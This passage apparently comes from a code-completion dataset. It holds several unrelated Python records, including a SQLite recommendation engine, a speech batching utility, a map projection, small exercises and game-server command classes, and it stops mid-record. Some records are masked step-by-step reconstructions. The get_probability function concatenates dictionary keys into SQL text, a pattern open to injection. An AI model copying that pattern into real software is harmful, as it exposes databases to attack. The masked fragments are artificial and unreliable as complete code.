"step-5": "__author__ = 'tomer'\nimport sqlite3\nfrom random import randint\nimport test_data\n\ndef init_database(conn):\n c = conn.cursor()\n c.execute('''CREATE TABLE IF NOT EXISTS catalogs\n (id INTEGER PRIMARY KEY AUTOINCREMENT, catalog_name TEXT)''')\n c.execute('''CREATE TABLE IF NOT EXISTS products\n (id INTEGER PRIMARY KEY AUTOINCREMENT, sku_id INTEGER, catalog_id INTEGER, product_name TEXT, price FLOAT, description TEXT)''')\n c.execute('''CREATE TABLE IF NOT EXISTS users\n (id INTEGER PRIMARY KEY AUTOINCREMENT, user_name TEXT)''')\n c.execute('''CREATE TABLE IF NOT EXISTS products_bought\n (id INTEGER PRIMARY KEY AUTOINCREMENT,user_id INTEGER,product_id INTEGER)''')\n c.execute('''CREATE TABLE IF NOT EXISTS product_context\n (id INTEGER PRIMARY KEY AUTOINCREMENT,recommendation_id INTEGER, product_id INTEGER, device TEXT, os TEXT, time_of_day TEXT, day_of_week TEXT, latitude float, longitude float,num_items_in_cart INTEGER, purchases_in_last_month INTEGER)''')\n c.execute('''CREATE TABLE IF NOT EXISTS recommendations\n (id INTEGER PRIMARY KEY AUTOINCREMENT,user_id INTEGER, product_id INTEGER, interacted BOOLEAN)''')\n\n\ndef load_fake_data(conn):\n\n c = conn.cursor()\n c.execute('''DELETE FROM catalogs''')\n c.execute('''DELETE FROM products''')\n c.execute('''DELETE FROM users''')\n c.execute('''DELETE FROM products_bought''')\n c.execute('''DELETE FROM product_context''')\n c.execute('''DELETE FROM recommendations''')\n\n catalogs = []\n c.execute('''INSERT INTO catalogs (catalog_name) VALUES (?)''',('BestBuy',))\n catalogs.append(c.lastrowid)\n c.execute('''INSERT INTO catalogs (catalog_name) VALUES (?)''',('RiteAid',))\n catalogs.append(c.lastrowid)\n\n\n ppl = []\n c.execute('''INSERT INTO users (user_name) VALUES (?)''',('Tomer',))\n ppl.append(c.lastrowid)\n c.execute('''INSERT INTO users (user_name) VALUES (?)''',('Alex',))\n ppl.append(c.lastrowid)\n c.execute('''INSERT INTO users (user_name) VALUES (?)''',('Matt',))\n ppl.append(c.lastrowid)\n c.execute('''INSERT INTO users (user_name) VALUES (?)''',('Rachael',))\n ppl.append(c.lastrowid)\n c.execute('''INSERT INTO users (user_name) VALUES (?)''',('Sam',))\n ppl.append(c.lastrowid)\n c.execute('''INSERT INTO users (user_name) VALUES (?)''',('Joey',))\n ppl.append(c.lastrowid)\n\n products = []\n # Load fake products\n for i in range(1,20):\n c.execute('''INSERT INTO products (id,sku_id,catalog_id, product_name, price,description) VALUES (NULL,?,?,?,?,?)''',(randint(1,2000),catalogs[randint(0,len(catalogs)-1)],'Movie' + str(i),randint(1,2000),'Title' + str(i)))\n products.append(c.lastrowid)\n\n # Load fake transactions\n for i in range(1,50):\n c.execute('''INSERT INTO products_bought (id,user_id, product_id) VALUES (NULL,?,?)''',(ppl[randint(0,len(ppl)-1)],products[randint(0,len(products)-1)]))\n values = (c.lastrowid,device[randint(0,len(device)-1)],oses[randint(0,len(oses)-1)], times[randint(0,len(times)-1)], days[randint(0,len(days)-1)], lats[randint(0,len(lats)-1)], lons[randint(0,len(lons)-1)],randint(0,5),randint(0,30))\n c.execute('''INSERT INTO product_context (id,recommendation_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?)''',values)\n\n # Load fake recommendations\n for i in range(1,1000):\n product_id = products[randint(0, len(products) - 1)]\n c.execute('''INSERT INTO recommendations (id,user_id, product_id, interacted) VALUES (NULL,?,?,'true')''',(ppl[randint(0,len(ppl)-1)],product_id))\n values = (c.lastrowid,product_id,device[randint(0,len(device)-1)],oses[randint(0,len(oses)-1)], times[randint(0,len(times)-1)], days[randint(0,len(days)-1)], lats[randint(0,len(lats)-1)], lons[randint(0,len(lons)-1)],randint(0,3),randint(0,3))\n c.execute('''INSERT INTO product_context (id,recommendation_id , product_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)''',values)\n conn.commit()\n\n\noses = ['IOS', 'Android']#, 'Windows10', 'macOS']\ndevice = ['mobile']#, 'computer']\n'''\ntimes = ['10:33 AM',\n'2:38 PM',\n'3:01 AM',\n'12:31 AM',\n'2:56 PM',\n'8:01 AM',\n'5:00 PM',\n'9:38 PM',\n'3:01 AM']\n'''\ntimes = ['morning', 'afternoon', 'night']\n\ndays = ['M']#['M', 'T', 'W', 'R', 'F', 'S', 'Su']\n\n'''\nlats = ['-149.8935557',\n'-149.9054948',\n'-149.7522',\n'-149.8643361',\n'-149.8379726',\n'-149.9092788',\n'-149.7364877',\n'-149.8211',\n'-149.8445832',\n'-149.9728678']\n'''\nlats = ['north']#, 'south']\n\n'''\nlons = ['61.21759217',\n'61.19533942',\n'61.2297',\n'61.19525062',\n'61.13751355',\n'61.13994658',\n'61.19533265',\n'61.2156',\n'61.13806145',\n'61.176693']\n'''\nlons = ['east']#, 'west']\n\n\ndef get_users(conn):\n c = conn.cursor()\n c.execute('''select * from users''')\n return c.fetchall()\n\n\ndef get_catalogs(conn):\n c = conn.cursor()\n c.execute('''select * from catalogs''')\n return c.fetchall()\n\n\ndef get_products(conn, catalog_id):\n c = conn.cursor()\n c.execute('''select * from products where catalog_id = ?''',(catalog_id,))\n return c.fetchall()\n\n\ndef get_product_by_id(conn, catalog_id, product_id):\n c = conn.cursor()\n c.execute('''SELECT * FROM products WHERE catalog_id = ? AND id = ?''',(catalog_id,product_id))\n return c.fetchall()\n\n\ndef get_products_bought(conn, catalog_id):\n c = conn.cursor()\n c.execute('''select pb.* from products_bought pb, catalogs cat, products p where pb.product_id = p.id and p.catalog_id = ?''',(catalog_id,))\n return c.fetchall()\n\n\ndef get_all_data(conn):\n c = conn.cursor()\n c.execute('''select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id''')\n return c. fetchall()\n\n\ndef get_data_for_user(conn,userid):\n c = conn.cursor()\n c.execute('''select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and u.id = ?''',(userid,))\n return c.fetchall()\n\n\ndef get_data_for_user_and_catalog(conn, userid, catalogid):\n c = conn.cursor()\n c.execute('''select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and u.id = ? and c.id = ?''',(userid,catalogid))\n return c.fetchall()\n\n\ndef get_transactions_for_catalog(conn,catalogid):\n c = conn.cursor()\n c.execute('''select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and c.id = ?''',(catalogid,))\n return c.fetchall()\n\n\ndef get_recommendations_by_user(conn,userId):\n c = conn.cursor()\n c.execute('''select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.user_id = ?''',(userId,))\n return c.fetchall()\n\n\ndef get_recommendations_by_product(conn,productId):\n c = conn.cursor()\n c.execute('''select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.product_id = ?''',(productId,))\n return c.fetchall()\n\n\ndef get_connection():\n return sqlite3.connect('recommendation_engine.db')\n\n\ndef generate_context(product_id):\n return [product_id, device[randint(0, len(device) - 1)], oses[randint(0, len(oses) - 1)],\n times[randint(0, len(times) - 1)], days[randint(0, len(days) - 1)], lats[randint(0, len(lats) - 1)],\n lons[randint(0, len(lons) - 1)], randint(0, 3), randint(0, 3)]\n\n\ndef add_recommendation(conn, product_ids,user_ids,contexts):\n ids = []\n c = conn.cursor()\n for i in range(0,len(product_ids)):\n product_id = product_ids[i]\n user_id = user_ids[i]\n context = contexts[i]\n c.execute('''INSERT INTO recommendations (id,user_id, product_id, interacted) VALUES (NULL,?,?,'false')''',\n (user_id, product_id))\n context.insert(0,c.lastrowid)\n ids.append(c.lastrowid)\n c.execute( '''INSERT INTO product_context (id,recommendation_id , product_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)''',\n context)\n conn.commit()\n c.execute('select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.id in (%s)' %\n ','.join('?'*len(ids)), ids)\n return c.fetchall()\n\n\ndef get_probability(conn, x, giveny):\n c = conn.cursor()\n query = '''select count(*) from product_context where '''\n first = True\n params = []\n for key,val in x.items():\n if not first:\n query += ' and '\n else:\n first = False\n query += str(key) + '=?'\n params.append(str(val))\n c.execute(query,params)\n total = c.fetchone()[0]\n\n for key,val in giveny.items():\n query += ' and ' + str(key) + '=?'\n params.append(str(val))\n c.execute(query,params)\n smaller = c.fetchone()[0]\n if total == 0:\n return 0\n else:\n return smaller/float(total)\n\n\ndef load_test_data(conn):\n c = conn.cursor()\n\n # Clear database\n c.execute('''DELETE FROM catalogs''')\n c.execute('''DELETE FROM products''')\n c.execute('''DELETE FROM users''')\n c.execute('''DELETE FROM products_bought''')\n c.execute('''DELETE FROM product_context''')\n c.execute('''DELETE FROM recommendations''')\n\n # Initialize users\n user_names = test_data.USER_NAMES\n\n # Initialize movie names\n product_names = test_data.PRODUCT_NAMES\n\n # Initialize Prices\n prices = test_data.POSSIBLE_PRICES\n\n # Load test catalog\n catalog_ids = []\n c.execute('''INSERT INTO catalogs (catalog_name) VALUES (?)''', ('MovieDatabase',))\n catalog_ids.append(c.lastrowid)\n\n # Load test users\n user_ids = []\n for user in user_names:\n c.execute('''INSERT INTO users (user_name) VALUES (?)''', (user,))\n user_ids.append(c.lastrowid)\n\n # Load test products\n product_ids = []\n for product in product_names:\n values = (randint(1, 2000), catalog_ids[0], product, prices[randint(0, len(prices)-1)], 'desc')\n c.execute('''INSERT INTO products (id, sku_id, catalog_id, product_name, price, description) VALUES (NULL,?,?,?,?,?)''', values)\n product_ids.append(c.lastrowid)\n\n # Load fake transactions\n for i in range(1, 50):\n values = (user_ids[randint(0, len(user_ids)-1)], product_ids[randint(0, len(product_ids)-1)])\n c.execute('''INSERT INTO products_bought (id,user_id,product_id) VALUES (NULL,?,?)''', values)\n\n values = (c.lastrowid,\n device[randint(0, len(device) - 1)],\n oses[randint(0, len(oses) - 1)],\n times[randint(0, len(times) - 1)],\n days[randint(0, len(days) - 1)],\n lats[randint(0, len(lats) - 1)],\n lons[randint(0, len(lons) - 1)],\n randint(0, 3),\n randint(0, 3))\n c.execute('''INSERT INTO product_context (id,recommendation_id,device,os,time_of_day,day_of_week,latitude,longitude,num_items_in_cart,purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?)''', values)\n\n # Load fake recommendations\n for i in range(1, 1000):\n product_id = product_ids[randint(0, len(product_ids)-1)]\n values = (user_ids[randint(0, len(user_ids)-1)], product_id,)\n c.execute('''INSERT INTO recommendations (id,user_id,product_id,interacted) VALUES (NULL,?,?,'True')''', values)\n\n values =(c.lastrowid,\n product_id,\n device[randint(0, len(device) - 1)],\n oses[randint(0, len(oses) - 1)],\n times[randint(0, len(times) - 1)],\n days[randint(0, len(days) - 1)],\n lats[randint(0, len(lats) - 1)],\n lons[randint(0, len(lons) - 1)],\n randint(0, 3),\n randint(0, 3))\n c.execute('''INSERT INTO product_context (id,recommendation_id,product_id,device,os,time_of_day,day_of_week,latitude,longitude,num_items_in_cart,purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)''', values)\n\n conn.commit()\n\n",
"step-ids": [
9,
17,
19,
20,
21
]
}
|
[
9,
17,
19,
20,
21
] |
import itertools
import numpy as np
import pandas as pd
from scipy.sparse import coo_matrix
def merge_and_split(inputs, labels):
df = inputs.reset_index().merge(labels.reset_index(), on='utterance',
how='inner').set_index('utterance')
return df.feat, df.label
def list_to_sparse(inputs):
"""Convert list of lists into scipy coo matrix.
"""
data = list(itertools.chain(*inputs))
row = list(itertools.chain(*[itertools.repeat(i, len(x)) for i, x in
enumerate(inputs)]))
col = list(itertools.chain(*[range(len(x)) for x in inputs]))
s = coo_matrix((data, (row, col)), shape=(len(inputs), np.max([len(x) for
x in inputs])))
return s
class BatchGenerator(object):
def __init__(self, data, batch_size=1):
self.inputs, self.labels = data
self.batch_size = batch_size
self.data_length = len(self.inputs)
self.sequence_length = np.array([x.shape[0] for x in self.inputs])
def next_batch(self):
self._suffle()
start = 0
end = 0
batch_size, data_length = self.batch_size, self.data_length
while end != data_length:
end += batch_size
end = data_length if end >= data_length else end
yield self._get(start, end)
start = end
def _suffle(self):
permutation = np.random.permutation(self.data_length)
self.inputs = self.inputs[permutation]
self.labels = self.labels[permutation]
self.sequence_length = self.sequence_length[permutation]
def _get(self, start, end):
sequence_length = self.sequence_length[start:end]
batch_sequence_length = np.max(sequence_length)
inputs = np.array([np.pad(x, pad_width=((0, batch_sequence_length -
len(x)), (0, 0)), mode='constant') for x in self.inputs[start:end]]
)
labels = list_to_sparse(self.labels[start:end])
return inputs, labels, sequence_length
|
normal
|
{
"blob_id": "912928cea0f96e601eecfcb6dba695ef26a3c6e2",
"index": 9618,
"step-1": "<mask token>\n\n\nclass BatchGenerator(object):\n\n def __init__(self, data, batch_size=1):\n self.inputs, self.labels = data\n self.batch_size = batch_size\n self.data_length = len(self.inputs)\n self.sequence_length = np.array([x.shape[0] for x in self.inputs])\n\n def next_batch(self):\n self._suffle()\n start = 0\n end = 0\n batch_size, data_length = self.batch_size, self.data_length\n while end != data_length:\n end += batch_size\n end = data_length if end >= data_length else end\n yield self._get(start, end)\n start = end\n\n def _suffle(self):\n permutation = np.random.permutation(self.data_length)\n self.inputs = self.inputs[permutation]\n self.labels = self.labels[permutation]\n self.sequence_length = self.sequence_length[permutation]\n\n def _get(self, start, end):\n sequence_length = self.sequence_length[start:end]\n batch_sequence_length = np.max(sequence_length)\n inputs = np.array([np.pad(x, pad_width=((0, batch_sequence_length -\n len(x)), (0, 0)), mode='constant') for x in self.inputs[start:end]]\n )\n labels = list_to_sparse(self.labels[start:end])\n return inputs, labels, sequence_length\n",
"step-2": "<mask token>\n\n\ndef list_to_sparse(inputs):\n \"\"\"Convert list of lists into scipy coo matrix.\n \"\"\"\n data = list(itertools.chain(*inputs))\n row = list(itertools.chain(*[itertools.repeat(i, len(x)) for i, x in\n enumerate(inputs)]))\n col = list(itertools.chain(*[range(len(x)) for x in inputs]))\n s = coo_matrix((data, (row, col)), shape=(len(inputs), np.max([len(x) for\n x in inputs])))\n return s\n\n\nclass BatchGenerator(object):\n\n def __init__(self, data, batch_size=1):\n self.inputs, self.labels = data\n self.batch_size = batch_size\n self.data_length = len(self.inputs)\n self.sequence_length = np.array([x.shape[0] for x in self.inputs])\n\n def next_batch(self):\n self._suffle()\n start = 0\n end = 0\n batch_size, data_length = self.batch_size, self.data_length\n while end != data_length:\n end += batch_size\n end = data_length if end >= data_length else end\n yield self._get(start, end)\n start = end\n\n def _suffle(self):\n permutation = np.random.permutation(self.data_length)\n self.inputs = self.inputs[permutation]\n self.labels = self.labels[permutation]\n self.sequence_length = self.sequence_length[permutation]\n\n def _get(self, start, end):\n sequence_length = self.sequence_length[start:end]\n batch_sequence_length = np.max(sequence_length)\n inputs = np.array([np.pad(x, pad_width=((0, batch_sequence_length -\n len(x)), (0, 0)), mode='constant') for x in self.inputs[start:end]]\n )\n labels = list_to_sparse(self.labels[start:end])\n return inputs, labels, sequence_length\n",
"step-3": "<mask token>\n\n\ndef merge_and_split(inputs, labels):\n df = inputs.reset_index().merge(labels.reset_index(), on='utterance',\n how='inner').set_index('utterance')\n return df.feat, df.label\n\n\ndef list_to_sparse(inputs):\n \"\"\"Convert list of lists into scipy coo matrix.\n \"\"\"\n data = list(itertools.chain(*inputs))\n row = list(itertools.chain(*[itertools.repeat(i, len(x)) for i, x in\n enumerate(inputs)]))\n col = list(itertools.chain(*[range(len(x)) for x in inputs]))\n s = coo_matrix((data, (row, col)), shape=(len(inputs), np.max([len(x) for\n x in inputs])))\n return s\n\n\nclass BatchGenerator(object):\n\n def __init__(self, data, batch_size=1):\n self.inputs, self.labels = data\n self.batch_size = batch_size\n self.data_length = len(self.inputs)\n self.sequence_length = np.array([x.shape[0] for x in self.inputs])\n\n def next_batch(self):\n self._suffle()\n start = 0\n end = 0\n batch_size, data_length = self.batch_size, self.data_length\n while end != data_length:\n end += batch_size\n end = data_length if end >= data_length else end\n yield self._get(start, end)\n start = end\n\n def _suffle(self):\n permutation = np.random.permutation(self.data_length)\n self.inputs = self.inputs[permutation]\n self.labels = self.labels[permutation]\n self.sequence_length = self.sequence_length[permutation]\n\n def _get(self, start, end):\n sequence_length = self.sequence_length[start:end]\n batch_sequence_length = np.max(sequence_length)\n inputs = np.array([np.pad(x, pad_width=((0, batch_sequence_length -\n len(x)), (0, 0)), mode='constant') for x in self.inputs[start:end]]\n )\n labels = list_to_sparse(self.labels[start:end])\n return inputs, labels, sequence_length\n",
"step-4": "import itertools\nimport numpy as np\nimport pandas as pd\nfrom scipy.sparse import coo_matrix\n\n\ndef merge_and_split(inputs, labels):\n df = inputs.reset_index().merge(labels.reset_index(), on='utterance',\n how='inner').set_index('utterance')\n return df.feat, df.label\n\n\ndef list_to_sparse(inputs):\n \"\"\"Convert list of lists into scipy coo matrix.\n \"\"\"\n data = list(itertools.chain(*inputs))\n row = list(itertools.chain(*[itertools.repeat(i, len(x)) for i, x in\n enumerate(inputs)]))\n col = list(itertools.chain(*[range(len(x)) for x in inputs]))\n s = coo_matrix((data, (row, col)), shape=(len(inputs), np.max([len(x) for\n x in inputs])))\n return s\n\n\nclass BatchGenerator(object):\n\n def __init__(self, data, batch_size=1):\n self.inputs, self.labels = data\n self.batch_size = batch_size\n self.data_length = len(self.inputs)\n self.sequence_length = np.array([x.shape[0] for x in self.inputs])\n\n def next_batch(self):\n self._suffle()\n start = 0\n end = 0\n batch_size, data_length = self.batch_size, self.data_length\n while end != data_length:\n end += batch_size\n end = data_length if end >= data_length else end\n yield self._get(start, end)\n start = end\n\n def _suffle(self):\n permutation = np.random.permutation(self.data_length)\n self.inputs = self.inputs[permutation]\n self.labels = self.labels[permutation]\n self.sequence_length = self.sequence_length[permutation]\n\n def _get(self, start, end):\n sequence_length = self.sequence_length[start:end]\n batch_sequence_length = np.max(sequence_length)\n inputs = np.array([np.pad(x, pad_width=((0, batch_sequence_length -\n len(x)), (0, 0)), mode='constant') for x in self.inputs[start:end]]\n )\n labels = list_to_sparse(self.labels[start:end])\n return inputs, labels, sequence_length\n",
"step-5": null,
"step-ids": [
5,
6,
7,
8
]
}
|
[
5,
6,
7,
8
] |
# aitoff projection
# see:
# https://en.wikipedia.org/wiki/Aitoff_projection
def aitoff_projection(theta, phi):
import numpy as np
# theta, phi in radian
theta = theta - np.pi
cos_phi = np.cos(phi)
denom = np.sqrt(1 + cos_phi * np.cos(theta/2))
x = 180 * cos_phi * np.sin(theta/2) / denom
x = x + 180
y = 90 * np.sin(phi) / denom
return x,y
|
normal
|
{
"blob_id": "0dcf90514543a1ca801e82cd402b3e1002b1f5d0",
"index": 9262,
"step-1": "<mask token>\n",
"step-2": "def aitoff_projection(theta, phi):\n import numpy as np\n theta = theta - np.pi\n cos_phi = np.cos(phi)\n denom = np.sqrt(1 + cos_phi * np.cos(theta / 2))\n x = 180 * cos_phi * np.sin(theta / 2) / denom\n x = x + 180\n y = 90 * np.sin(phi) / denom\n return x, y\n",
"step-3": "# aitoff projection\n# see:\n# https://en.wikipedia.org/wiki/Aitoff_projection\ndef aitoff_projection(theta, phi):\n import numpy as np\n # theta, phi in radian\n theta = theta - np.pi\n cos_phi = np.cos(phi)\n denom = np.sqrt(1 + cos_phi * np.cos(theta/2))\n x = 180 * cos_phi * np.sin(theta/2) / denom\n x = x + 180\n y = 90 * np.sin(phi) / denom\n return x,y\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in a:
for j in b:
for k in c:
if i + k + j == 1000 and i < j < k and j ** 2 + i ** 2 == k ** 2:
print(i)
print(j)
print(k)
break
<|reserved_special_token_1|>
a = list(range(1, 501))
b = list(range(1, 501))
c = list(range(1, 501))
for i in a:
for j in b:
for k in c:
if i + k + j == 1000 and i < j < k and j ** 2 + i ** 2 == k ** 2:
print(i)
print(j)
print(k)
break
|
flexible
|
{
"blob_id": "34947b7ed300f2cbcbf9042fee3902458921d603",
"index": 2912,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in a:\n for j in b:\n for k in c:\n if i + k + j == 1000 and i < j < k and j ** 2 + i ** 2 == k ** 2:\n print(i)\n print(j)\n print(k)\n break\n",
"step-3": "a = list(range(1, 501))\nb = list(range(1, 501))\nc = list(range(1, 501))\nfor i in a:\n for j in b:\n for k in c:\n if i + k + j == 1000 and i < j < k and j ** 2 + i ** 2 == k ** 2:\n print(i)\n print(j)\n print(k)\n break\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import time
from tests.test_base import BaseTest
from pages.campo_de_treinamento_page import CampoDeTreinamentoPage
class TestCadastro(BaseTest):
def test_cadastro_com_sucesso(self):
self.campoDeTreinamento = CampoDeTreinamentoPage(self.driver)
self.campoDeTreinamento.fill_name("Everton")
self.campoDeTreinamento.fill_sobrenome("Araujo")
self.campoDeTreinamento.select_sexo_masculino()
self.campoDeTreinamento.cadastra()
time.sleep(3)
|
normal
|
{
"blob_id": "4e50a7a757bacb04dc8f292bdaafb03c86042e6c",
"index": 1633,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestCadastro(BaseTest):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass TestCadastro(BaseTest):\n\n def test_cadastro_com_sucesso(self):\n self.campoDeTreinamento = CampoDeTreinamentoPage(self.driver)\n self.campoDeTreinamento.fill_name('Everton')\n self.campoDeTreinamento.fill_sobrenome('Araujo')\n self.campoDeTreinamento.select_sexo_masculino()\n self.campoDeTreinamento.cadastra()\n time.sleep(3)\n",
"step-4": "import time\nfrom tests.test_base import BaseTest\nfrom pages.campo_de_treinamento_page import CampoDeTreinamentoPage\n\n\nclass TestCadastro(BaseTest):\n\n def test_cadastro_com_sucesso(self):\n self.campoDeTreinamento = CampoDeTreinamentoPage(self.driver)\n self.campoDeTreinamento.fill_name('Everton')\n self.campoDeTreinamento.fill_sobrenome('Araujo')\n self.campoDeTreinamento.select_sexo_masculino()\n self.campoDeTreinamento.cadastra()\n time.sleep(3)\n",
"step-5": "import time\nfrom tests.test_base import BaseTest\nfrom pages.campo_de_treinamento_page import CampoDeTreinamentoPage\n\n\nclass TestCadastro(BaseTest):\n def test_cadastro_com_sucesso(self):\n self.campoDeTreinamento = CampoDeTreinamentoPage(self.driver)\n self.campoDeTreinamento.fill_name(\"Everton\")\n self.campoDeTreinamento.fill_sobrenome(\"Araujo\")\n self.campoDeTreinamento.select_sexo_masculino()\n self.campoDeTreinamento.cadastra()\n time.sleep(3)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for x in range(1, 5):
for y in range(1, 5):
for z in range(1, 5):
if (x != y) & (x != z) & (y != z):
print(x, y, z)
<|reserved_special_token_1|>
''' 简述:这里有四个数字,分别是:1、2、3、4
提问:能组成多少个互不相同且无重复数字的三位数?各是多少? '''
for x in range(1,5):
for y in range(1,5):
for z in range(1,5):
if (x != y) & (x != z) & (y != z):
print(x,y,z)
|
flexible
|
{
"blob_id": "caac877bf6c42217ea41f51717f6a704a3a9774b",
"index": 6838,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor x in range(1, 5):\n for y in range(1, 5):\n for z in range(1, 5):\n if (x != y) & (x != z) & (y != z):\n print(x, y, z)\n",
"step-3": "''' 简述:这里有四个数字,分别是:1、2、3、4\n提问:能组成多少个互不相同且无重复数字的三位数?各是多少? '''\n\nfor x in range(1,5):\n for y in range(1,5):\n for z in range(1,5):\n if (x != y) & (x != z) & (y != z):\n print(x,y,z)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from __future__ import annotations
import math
from abc import abstractmethod
from pytown_core.patterns.behavioral import Command
from pytown_core.serializers import IJSONSerializable
from .buildings import BuildingProcess, BuildingTransaction
from .buildings.factory import BuildingFactory
from .check import (
AvailableCheck,
AwakenCheck,
BackgroundBuildCheck,
BackgroundMovementCheck,
CheckResult,
EnergyCheck,
InventoryAddCheck,
InventoryRemoveCheck,
TransactionCheck,
)
from .inventory import Item
class ServerCommand(IJSONSerializable, Command):
def __init__(self):
self.client_id = None
self.town = None # TODO: will be set by townmanager
self.check_result = CheckResult()
def execute(self):
self._check()
if self.check_result:
self._do()
@abstractmethod
def _check(self):
raise NotImplementedError
@abstractmethod
def _do(self):
raise NotImplementedError
@abstractmethod
def __repr__(self):
pass
@classmethod
@abstractmethod
def from_json_dict(cls, json_dict) -> ServerCommand:
raise NotImplementedError
def to_json_dict(self) -> dict:
json_dict = {}
json_dict["client_id"] = self.client_id
json_dict["check_result"] = self.check_result.to_json_dict()
return json_dict
def to_podsixnet(self):
podsixnet_dict = self.to_json_dict()
podsixnet_dict["action"] = "command"
return podsixnet_dict
class MovePlayerCommand(ServerCommand):
ENERGY_COST = 1
def __init__(self, direction: str):
ServerCommand.__init__(self)
self._direction = direction
def __repr__(self):
msg = "Move ServerCommand : {}".format(self._direction)
if not self.check_result:
msg += "\n{}".format(self.check_result)
return msg
def _check(self):
player = self.town.get_player(self.client_id)
EnergyCheck(player, MovePlayerCommand.ENERGY_COST).check(self.check_result)
AvailableCheck(player).check(self.check_result)
for tile in self._get_tiles_coordinates_dict().values():
if tile not in self.town.backgrounds.keys():
self.check_result += "tile {} not in town".format(tile)
return
BackgroundMovementCheck(self.town.backgrounds[tile], player).check(
self.check_result
)
def _do(self):
(x_dest, y_dest) = self.tile_dest
player = self.town.get_player(self.client_id)
player.status = "move"
player.direction = self._direction
player.energy.value -= MovePlayerCommand.ENERGY_COST
player.x = x_dest
player.y = y_dest
@property
def tile_dest(self) -> tuple:
movement_matrix = {}
movement_matrix["left"] = (-1, 0)
movement_matrix["right"] = (+1, 0)
movement_matrix["up"] = (0, -1)
movement_matrix["down"] = (0, +1)
player = self.town.get_player(self.client_id)
tile = self.town.get_player_tile(self.client_id)
background = self.town.backgrounds[tile]
bg_multiplicator = background.move_multiplicator
x_dest = (
player.x
+ movement_matrix[self._direction][0] * bg_multiplicator * player.velocity
)
y_dest = (
player.y
+ movement_matrix[self._direction][1] * bg_multiplicator * player.velocity
)
return (x_dest, y_dest)
def _get_tiles_coordinates_dict(self):
(x_dest, y_dest) = self.tile_dest
tiles_coordinates_dict = {
"topleft": (math.floor(x_dest), math.floor(y_dest)),
"topright": (math.floor(x_dest + 0.99), math.floor(y_dest)),
"bottomleft": (math.floor(x_dest), math.floor(y_dest + 0.99)),
"bottomright": (math.floor(x_dest + 0.99), math.floor(y_dest + 0.99)),
}
return tiles_coordinates_dict
@classmethod
def from_json_dict(cls, json_dict) -> MovePlayerCommand:
return cls(json_dict["direction"])
def to_json_dict(self):
json_dict = super().to_json_dict()
json_dict["command"] = "move"
json_dict["direction"] = self._direction
return json_dict
class BuildCommand(ServerCommand):
def __init__(self, tile: tuple, building_name: str):
ServerCommand.__init__(self)
self._tile = tile
self._building_name = building_name
def _check(self):
player = self.town.get_player(self.client_id)
AvailableCheck(player).check(self.check_result)
if self._tile not in self.town.backgrounds:
self.check_result += "tile {} not in town".format(self._tile)
return
background = self.town.backgrounds[self._tile]
BackgroundBuildCheck(background, self._building_name).check(self.check_result)
if self._tile in self.town.buildings:
self.check_result += "Can't build {} : {} already built on {}".format(
self._building_name, self.town.buildings[self._tile].name, self._tile
)
def _do(self):
self.town.set_building(
BuildingFactory.create_building_by_name(self._building_name), self._tile
)
def __repr__(self):
msg = "Build ServerCommand : {} in {}".format(self._building_name, self._tile)
if not self.check_result:
msg += "\n{}".format(self.check_result)
return msg
@classmethod
def from_json_dict(cls, json_dict: dict) -> BuildCommand:
return cls(json_dict["tile"], json_dict["building_name"])
def to_json_dict(self):
json_dict = super().to_json_dict()
json_dict["command"] = "build"
json_dict["building_name"] = self._building_name
json_dict["tile"] = self._tile
return json_dict
class CollectResourceCommand(ServerCommand):
ENERGY_COST = 30
def __init__(self, tile: tuple, item: Item):
ServerCommand.__init__(self)
self._tile = tile
self._item = item
def _check(self):
player = self.town.get_player(self.client_id)
AvailableCheck(player).check(self.check_result)
if self._tile not in self.town.resources:
self.check_result += "No resource in {}".format(self._tile)
return
resource = self.town.resources[self._tile]
TransactionCheck(resource, player, self._item).check(self.check_result)
EnergyCheck(player, CollectResourceCommand.ENERGY_COST).check(self.check_result)
def _do(self):
player = self.town.get_player(self.client_id)
player.inventory.add_item(self._item)
resource = self.town.resources[self._tile]
resource.inventory.remove_item(self._item)
player.energy.value -= CollectResourceCommand.ENERGY_COST
def __repr__(self):
msg = "Collect Resource ServerCommand : {}".format(self._item)
if not self.check_result:
msg += "\n{}".format(self.check_result)
return msg
@classmethod
def from_json_dict(cls, json_dict: dict) -> CollectResourceCommand:
return cls(json_dict["tile"], Item.from_json_dict(json_dict["item"]))
def to_json_dict(self) -> dict:
json_dict = super().to_json_dict()
json_dict["command"] = "collect"
json_dict["tile"] = self._tile
json_dict["item"] = self._item.to_json_dict()
return json_dict
class BuildingProcessCommand(ServerCommand):
def __init__(self, tile: tuple, building_process: BuildingProcess):
ServerCommand.__init__(self)
